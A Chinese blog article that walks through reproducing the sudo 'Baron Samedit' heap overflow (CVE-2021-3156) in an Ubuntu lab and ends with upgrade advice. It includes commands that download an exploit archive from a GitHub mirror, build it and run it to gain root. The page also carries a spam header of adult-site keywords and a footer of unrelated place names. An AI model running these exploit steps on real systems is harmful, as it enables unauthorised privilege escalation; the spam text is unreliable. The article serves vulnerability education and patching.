91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Sudo溢出漏洞CVE-2021-3156的示例分析

發布時間:2021-12-28 20:26:30 來源:億速云 閱讀:120 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關 Sudo溢出漏洞CVE-2021-3156的示例分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

0x00簡介

sudo是linux系統管理指令,是允許系統管理員讓普通用戶執行一些或者全部的root命令的一個工具,如halt、reboot、su等等。這樣不僅減少了root用戶的登錄 和管理時間,同樣也提高了安全性。sudo不是對shell的一個代替,它是面向每個命令的。

0x01漏洞概述

2021年01月26日,sudo被披露存在一個基于堆的緩沖區溢出漏洞(CVE-2021-3156,該漏洞被命名為“Baron Samedit”),可導致本地權限提升。

當在類Unix的操作系統上執行命令時,非root用戶可以使用sudo命令來以root用戶身份執行命令。由于sudo錯誤地在參數中轉義了反斜杠導致堆緩沖區溢出,從而允許任何本地用戶(無論是否在sudoers文件中)獲得root權限,無需進行身份驗證,且攻擊者不需要知道用戶密碼。

0x02影響范圍

sudo 1.8.2 - 1.8.31p2

sudo 1.9.0 - 1.9.5p1

0x03環境搭建

本次環境使用ubuntu19.04版本

1、官方下載地址:http://old-releases.ubuntu.com/releases/19.04/

Sudo溢出漏洞CVE-2021-3156的示例分析

2、使用Vmware虛擬機安裝最小安裝即可。(具體安裝過程自行百度)

Sudo溢出漏洞CVE-2021-3156的示例分析

0x04漏洞復現

1、在終端輸入sudo –version查看sudo版本,使用whoami查看當前用戶

Sudo溢出漏洞CVE-2021-3156的示例分析

Sudo溢出漏洞CVE-2021-3156的示例分析

2、使用GitHub上的exp進行漏洞利用,使用wget或git進行下載

wget https://hub.fastgit.org/blasty/CVE-2021-3156/archive/main.zip

unzip main.zip

Sudo溢出漏洞CVE-2021-3156的示例分析

Sudo溢出漏洞CVE-2021-3156的示例分析

3、進入解壓的目錄,使用make編譯成可執行文件

cd CVE-2021-3156-main/

make

Sudo溢出漏洞CVE-2021-3156的示例分析

4、執行編譯出來的文件后面加上ubuntu執行可以看到已經是root權限了(使用Debian的系統也可以)

./sudo-hax-me-a-sandwich ubuntu

Sudo溢出漏洞CVE-2021-3156的示例分析

0x05修復建議

目前官方已在sudo新版本1.9.5p2中修復了該漏洞,請受影響的用戶盡快升級版本進行防護。

下載地址:https://www.sudo.ws/download.html

Sudo溢出漏洞CVE-2021-3156的示例分析

以上就是 Sudo溢出漏洞CVE-2021-3156的示例分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

鹰潭市| 北安市| 错那县| 屏山县| 彩票| 武陟县| 临猗县| 靖安县| 葵青区| 五原县| 宁国市| 区。| 广宁县| 宁陕县| 霍林郭勒市| 洛阳市| 志丹县| 西林县| 景德镇市| 得荣县| 泸州市| 扶沟县| 上饶市| 邮箱| 二手房| 长顺县| 美姑县| 绥芬河市| 卓资县| 桑日县| 长丰县| 澄江县| 盘山县| 临澧县| 哈尔滨市| 湟中县| 九江县| 墨竹工卡县| 梧州市| 吴桥县| 全南县|